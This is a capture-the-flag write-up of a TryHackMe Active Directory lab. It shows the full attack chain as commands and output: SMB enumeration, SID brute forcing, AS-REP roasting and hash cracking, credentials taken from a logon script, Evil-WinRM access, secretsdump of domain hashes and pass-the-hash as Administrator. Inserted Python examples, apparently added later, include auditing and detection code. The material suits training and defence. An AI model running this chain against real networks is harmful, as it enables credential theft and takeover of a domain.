TryHackMe >> VulnNet – Roasted

DESCRIPTION

VulnNet Entertainment just deployed a new instance on their network with the newly hired system administrators. Being a security-aware company, they have, as always, hired you to perform a penetration test and see how the system administrators are performing.

ENUM >> NMAP

# Nmap 7.92 scan initiated Sun Feb 13 12:01:45 2022 as: nmap -sS -A -p 53,88,135,139,389,445,464,593,636,3268,3269 -oN nmap_agressive 10.10.31.100
Nmap scan report for 10.10.31.100
Host is up (0.39s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-13 01:02:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 59s
| smb2-time: 
|   date: 2022-02-13T01:03:28
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   407.94 ms 10.9.0.1
2   408.00 ms 10.10.31.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 12:03:16 2022 -- 1 IP address (1 host up) scanned in 91.77 seconds

No web server… just a plain server with default ports… SMB! 😉

ENUM >> SMB shares

  • First, let's see what shares (if any) we can reach – I included a username but left the password blank, since supplying no username at all causes a failure due to lack of access.
❯ smbmap -u stimpz -H 10.10.31.100
[+] Guest session       IP: 10.10.31.100:445    Name: vulnnet-rst.local0
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        SYSVOL                                                  NO ACCESS       Logon server share
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • Looks like we have access to two non-default shares, VulnNet-Business-Anonymous and VulnNet-Enterprise-Anonymous. Each share holds 3 text files:

  • VulnNet-Business-Anonymous:

❯ smbclient \\\\10.10.31.100\\VulnNet-Business-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar 13 13:46:40 2021
  ..                                  D        0  Sat Mar 13 13:46:40 2021
  Business-Manager.txt                A      758  Fri Mar 12 12:24:34 2021
  Business-Sections.txt               A      654  Fri Mar 12 12:24:34 2021
  Business-Tracking.txt               A      471  Fri Mar 12 12:24:34 2021

                8771839 blocks of size 4096. 4526264 blocks available
  • VulnNet-Enterprise-Anonymous:
❯ smbclient \\\\10.10.31.100\\VulnNet-Enterprise-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar 13 13:46:40 2021
  ..                                  D        0  Sat Mar 13 13:46:40 2021
  Enterprise-Operations.txt           A      467  Fri Mar 12 12:24:34 2021
  Enterprise-Safety.txt               A      503  Fri Mar 12 12:24:34 2021
  Enterprise-Sync.txt                 A      496  Fri Mar 12 12:24:34 2021

                8771839 blocks of size 4096. 4522008 blocks available
  • Out of the 6 text files, 4 mention a unique full name. I ended up dumping those full names into a text file:
Alexa Whitehat
Jack Goldenhand
Tony Skid
Johnny Leet
  • Then, I ran a custom ruleset with John The Ripper that created a userlist from the list of full names, and I also added two known default account names, Administrator and krbtgt, to the top of the file. I strongly suggest checking out Dzmitry Savitski’s blog post for details on how to set up his ruleset; it worked flawlessly and was actually one of the few that generated the right pattern for this system’s naming convention.
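As an added illustration (not part of the original writeup) of why this guessing works: with only the four public names above, a handful of common AD naming conventions, and the usernames that lookupsid.py later confirms, a short script reproduces the userlist and shows which convention the domain follows. The convention table and the `known_usernames` argument are my assumptions, not anything the page states.

```python
# Added example: reproduce the page's username guessing from public full names.
FULL_NAMES = ["Alexa Whitehat", "Jack Goldenhand", "Tony Skid", "Johnny Leet"]

# Common Active Directory naming conventions (assumed table, not from the page).
CONVENTIONS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "f-last":     lambda f, l: f"{f[0]}-{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "lastf":      lambda f, l: f"{l}{f[0]}",
}

def candidates(full_name):
    """Map one 'First Last' string to {convention: username}, lower-cased."""
    parts = full_name.lower().split()
    first, last = parts[0], parts[-1]          # ignore middle names
    return {conv: fn(first, last) for conv, fn in CONVENTIONS.items()}

def infer_convention(full_names, known_usernames):
    """Score each convention by how many confirmed usernames (e.g. from the
    lookupsid.py output) it explains; return (best_convention, hits)."""
    known = {u.lower() for u in known_usernames}
    scores = {conv: 0 for conv in CONVENTIONS}
    for name in full_names:
        for conv, user in candidates(name).items():
            if user in known:
                scores[conv] += 1
    best = max(scores, key=scores.get)
    return best, scores[best]

def build_userlist(full_names, convention, defaults=("Administrator", "krbtgt")):
    """Userlist in the shape the page fed to Kerbrute: default accounts first,
    then one derived username per person, duplicates removed."""
    users = list(defaults)
    for name in full_names:
        user = candidates(name)[convention]
        if user not in users:
            users.append(user)
    return users

if __name__ == "__main__":
    # Usernames confirmed later on the page by lookupsid.py
    confirmed = ["a-whitehat", "t-skid", "j-goldenhand", "j-leet", "enterprise-core-vn"]
    conv, hits = infer_convention(FULL_NAMES, confirmed)
    print(f"domain convention looks like '{conv}' ({hits}/{len(FULL_NAMES)} names explained)")
    print("\n".join(build_userlist(FULL_NAMES, conv)))
```

The defensive takeaway is the mirror image: four names on an anonymous share plus a predictable convention are enough to reconstruct most of the domain's user accounts.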

  • Finally, I ran Kerbrute against the list and got the following response:

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/13/22 - Ronnie Flathers @ropnop

2022/02/13 13:51:29 >  Using KDC(s):
2022/02/13 13:51:29 >   vulnnet-rst.local:88

2022/02/13 13:51:29 >  [+] VALID USERNAME:       administrator@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       j-goldenhand@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       a-whitehat@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       t-skid@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       j-leet@vulnnet-rst.local
2022/02/13 13:51:33 >  Done! Tested 106 usernames (5 valid) in 4.483 seconds
  • However… as you will see below, there is a MUCH easier way than going the whole route this far, and that is the one we will use.

ENUM >> Users to scan against…

  • Impacket has a wonderful tool named lookupsid.py that can be used to rip users and groups – it pulls the list directly via SID brute forcing. Ironically, I tried to do the same via crackmapexec and even enum4linux, but neither worked:
❯ lookupsid.py anonymous@10.10.158.170 | tee vulnnet_users.txt
Password:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.158.170
[*] StringBinding ncacn_np:10.10.158.170[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
  • Then to grab only the users and drop them in a list, we can use the following command:
❯ grep SidTypeUser vulnnet_users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt
  • This leaves us with the following userlist:
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

ENUM >> Impacket’s GetNPUsers.py

  • Let’s throw our newly generated userlist at GetNPUsers.py and see what we get:
❯ GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.158.170 -no-pass -usersfile users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set

<REDACTED>

[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
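Added example, not from the original post: what GetNPUsers.py is really testing is the DONT_REQ_PREAUTH bit of each account's userAccountControl attribute. The script below decodes that attribute, lists the accounts an AS-REP roast would succeed against, and builds the LDAP filter an administrator can run to audit for the same condition. The sample userAccountControl values are constructed and assumed, chosen so that only t-skid comes back, as in the output above.

```python
# Added example: decode userAccountControl and find AS-REP-roastable accounts.
# Bit values are Microsoft's documented ADS_USER_FLAG constants.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x001000: "WORKSTATION_TRUST_ACCOUNT",
    0x002000: "SERVER_TRUST_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000
BIT_AND = "1.2.840.113556.1.4.803"   # LDAP_MATCHING_RULE_BIT_AND

def decode_uac(value):
    """Names of the set bits, in ascending bit order."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def asrep_roastable(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl).
    Returns the accounts GetNPUsers.py could pull an AS-REP for: preauth
    disabled and the account enabled.  A disabled account (krbtgt is disabled
    by default) makes the KDC answer KDC_ERR_CLIENT_REVOKED instead."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]

def roastable_ldap_filter():
    """Equivalent LDAP filter for an admin-side audit (bitwise AND matching rule)."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{BIT_AND}:={DONT_REQ_PREAUTH})"
            f"(!(userAccountControl:{BIT_AND}:={ACCOUNTDISABLE})))")

# Constructed sample mirroring the page's userlist; the UAC values are assumed,
# chosen so that only t-skid is roastable, matching the GetNPUsers output.
SAMPLE_ACCOUNTS = [
    ("Administrator",      0x010200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("Guest",              0x010202),  # ... | ACCOUNTDISABLE
    ("krbtgt",             0x000202),  # disabled -> KDC_ERR_CLIENT_REVOKED
    ("WIN-2BO8M1OE1M1$",   0x082000),  # DC machine account
    ("enterprise-core-vn", 0x010200),
    ("a-whitehat",         0x010200),
    ("t-skid",             0x410200),  # DONT_REQ_PREAUTH set
    ("j-goldenhand",       0x010200),
    ("j-leet",             0x010200),
]

if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS:
        print(f"{name:20} {uac:#08x} {', '.join(decode_uac(uac))}")
    print("roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
    print(roastable_ldap_filter())
```

The filter is what to feed to ldapsearch or an AD query tool when checking a domain for accounts that never needed this flag.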

LOOT >> Cracking t-skid’s AS-REP hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt t-skid_as-rep.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED>        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2022-02-13 14:56) 0.2358g/s 749645p/s 749645c/s 749645C/s tjalling..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed

ENUM >> More SMB… with a user this time!

  • Using t-skid’s credentials we get two more readable shares… NETLOGON and SYSVOL:
✖ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445       Name: vulnnet-rst.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • If we do a recursive listing of the NETLOGON share we see a file titled ResetPassword.vbs:
❯ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170 -R 'NETLOGON'
[+] IP: 10.10.158.170:445       Name: vulnnet-rst.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        NETLOGON                                                READ ONLY
        .\NETLOGON\*
        dr--r--r--                0 Wed Mar 17 10:15:49 2021    .
        dr--r--r--                0 Wed Mar 17 10:15:49 2021    ..
        fr--r--r--             2821 Wed Mar 17 10:18:14 2021    ResetPassword.vbs
LOOT >> More creds from ResetPassword.vbs
  • Inside ResetPassword.vbs we have 2 very interesting lines:
strUserNTName = "<REDACTED>"
strPassword = "<REDACTED>"
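Added example, not from the original writeup: a small scanner for the kind of hard-coded credentials that ResetPassword.vbs contains, meant to be run by whoever maintains the logon scripts over a local copy of NETLOGON/SYSVOL. The VBScript sample is a constructed stand-in with placeholder values, not the real file, and the variable-name heuristics are my own.

```python
import os
import re
from collections import namedtuple

Finding = namedtuple("Finding", "path line kind name value")

# name = "value" assignments (VBScript, or PowerShell with a leading $)
ASSIGN = re.compile(r"""^\s*\$?(?P<var>\w+)\s*=\s*["'](?P<val>[^"']+)["']""")
PASSWORD_VAR = re.compile(r"pass(word|wd)?|pwd|secret|cred", re.I)
USER_VAR = re.compile(r"user|login|account", re.I)
# command-line password switches such as cmdkey's /pass:<value>
SWITCH = re.compile(r"/(?:password|pass|p):(?P<val>\S+)", re.I)

def redact(value):
    """Keep only the first character so a report never reproduces the secret."""
    return value[:1] + "*" * (len(value) - 1)

def scan_script(text, path):
    """Return Findings for hard-coded usernames/passwords in one script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ASSIGN.match(line)
        if m and PASSWORD_VAR.search(m.group("var")):
            findings.append(Finding(path, lineno, "password", m.group("var"), redact(m.group("val"))))
        elif m and USER_VAR.search(m.group("var")):
            findings.append(Finding(path, lineno, "username", m.group("var"), m.group("val")))
        for s in SWITCH.finditer(line):
            findings.append(Finding(path, lineno, "password", "switch", redact(s.group("val"))))
    return findings

def scan_tree(root, exts=(".vbs", ".bat", ".cmd", ".ps1")):
    """Walk a local copy of NETLOGON/SYSVOL and scan every script in it."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                p = os.path.join(dirpath, fn)
                with open(p, errors="replace") as fh:
                    results.extend(scan_script(fh.read(), p))
    return results

# Constructed stand-in for ResetPassword.vbs; placeholder values, not the real file.
SAMPLE_VBS = """' constructed sample logon script
Option Explicit
Dim strUserNTName, strPassword, objUser
strUserNTName = "svc-reset"
strPassword = "Placeholder123!"
Set objUser = GetObject("LDAP://CN=svc-reset,OU=Service,DC=example,DC=local")
' old one-liner left behind by an admin:
' cmdkey /add:fileserver /user:svc-reset /pass:Placeholder123!
"""

if __name__ == "__main__":
    for f in scan_script(SAMPLE_VBS, "NETLOGON/ResetPassword.vbs"):
        print(f"{f.path}:{f.line} {f.kind} in {f.name}: {f.value}")
```

Every domain user can read NETLOGON, so anything the scanner flags there is effectively public to the whole domain.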
  • Let’s see what smbmap comes back with when we try them:
❯ smbmap -u a-whitehat -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445       Name: vulnnet-rst.local
[-] Work[!] Unable to remove test directory at \\10.10.158.170\SYSVOL\CSTFIGYZGM, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     Remote Admin
        C$                                                      READ, WRITE     Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ, WRITE     Logon server share
        SYSVOL                                                  READ, WRITE     Logon server share
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • Now we are definitely getting somewhere… R/W access on ADMIN$ means we have some serious privs now! 😉

PRIVESC >> a-whitehat has WinRM access!

❯ evil-winrm -i vulnnet-rst.local -u a-whitehat -p <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\a-whitehat\Documents>
  • Hooray! Shell access as a user with elevated privileges! We can hopefully run secretsdump against the DC from here. First things first though…
LOOT >> user.txt
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> ls
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> Get-ChildItem -Path C:\Users\ -Recurse -Include user.txt

    Directory: C:\Users\enterprise-core-vn\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt

*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> cat C:\Users\enterprise-core-vn\Desktop\user.txt
<REDACTED>

ENUM >> secretsdump using a-whitehat’s credentials

  • a-whitehat brings the goods! 😉
❯ secretsdump.py 'vulnnet-rst.local/a-whitehat:<REDACTED>@10.10.219.71'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

<REDACTED>

[*] Cleaning up...
  • Awesome! Now that we have the Administrator NTLM hash… can we use it to login via WinRM?
❯ evil-winrm -i vulnnet-rst.local -u Administrator -H <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
LOOT >> system.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
<REDACTED>
